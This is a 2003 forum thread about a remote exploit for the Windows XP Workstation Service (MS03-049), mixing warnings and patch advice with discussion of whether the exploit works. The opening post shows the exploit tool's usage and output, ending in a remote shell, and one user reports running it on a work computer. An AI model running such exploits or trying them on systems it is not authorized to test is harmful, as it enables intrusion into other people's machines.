heads up guys XP Workstation Service Remote Exploit

Printable View

December 5th, 2003, 06:26 PM
st1mpy

heads up guys XP Workstation Service Remote Exploit

there is an exploit floating arround for xp

[code]
d:\>rpc_wks_bo.exe

WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
-------------------------------------------------------------------
Usage: rpc_wks_bo.exe [-ht]
-h <IP> : Target IP
-t <Type> : Target type (-t0 for a list)

d:\>rpc_wks_bo.exe -t0

Possible targets are:
============================
1) Window XP Pro + SP0 [Rus]
2) Window XP Pro + SP1 [Rus]
3) Crash all

d:\>rpc_wks_bo.exe -h localhost -t1

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[+] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[+] Socket initialized - OK
[+] Try connecting to localhost:9191 ...[*] Connected to shell at localhost:9191

hope it helps guys ;)
December 5th, 2003, 08:12 PM
tekno

thanks for the heads up....

does this affect all version of XP or just the russian edition?
December 5th, 2003, 11:49 PM
st1mpy

i dono that guys web page was up but now its offline he said the ver for english is coming out too but i dono hope ms does something about it :cool:
December 6th, 2003, 12:28 AM
Und3ertak3r

Not exactly new: But a very timely warning.. Good find and warning..

The info is in the M$ knowledgebase Here
The page has the links to the patches..
Oh the page was last updated on the 19th of November.. first posted Nov 11th..

Win XP users need to look at the updates associated with MS03-043

My system is patched.. but the service is Off.

It follows the std rules..

1/ disable any un-neccessary or un-needed Services..
2/ keep uptodate with the patches .. this is hard due to number of systems for some and the need for testing of patches..
3/ prevent any ***** expert from changing your settings.. (any user on our work system faces dismissal if they enable ANY service.. (they have to hack their system to start with)

Cheers
December 6th, 2003, 03:40 AM
st1mpy

ehehe yeah not that new but still it exploits so yea patch it boyz :( i run 2k so np with me hehe
December 9th, 2003, 08:25 PM
phorvati

First of all that code can never run. You need to run-time link the WKSSVC.dll function NetAddAlternateComputerName. Remember this is an undocumented function.
Also it only works on FAT32. So the english version will have to wait.
Read about it here:
http://www.eeye.com/html/Research/Ad...D20031111.html
But there is still much work to be done because the exploit is deep in the looging function which doesn't even get executed if you're default $ipc session on NTFS.
By the way the code crashes my w2k box but only after I connect to it via $ipc session and admin password as opposed to no password. Meanwhile it doesn't crash my xp. I keep them both up to date as of last week.
So sorry to say but the script kiddies will have to wait on this one. However the patch will probably fix the logging function so even if you find a way to execute it, this exploit will have a hard time spreading.
December 9th, 2003, 09:42 PM
cross

just FYI, I got a copy of this code that works on xp sp1 english. I think it was made for rus but it works here on the english version next to me.
December 9th, 2003, 10:55 PM
phorvati

FAT32 or NTFS file system? Did you compile it from source or got the executable from somewhere.
December 9th, 2003, 10:59 PM
cross

ntfs, it was pre-compiled exe, supprise, and i just happened to try it on our techroom computer at work. I definatly had write access to the drive, not sure about much else, didn't have too much time to play. Altough it did not work on another computer accross the room, not sure why...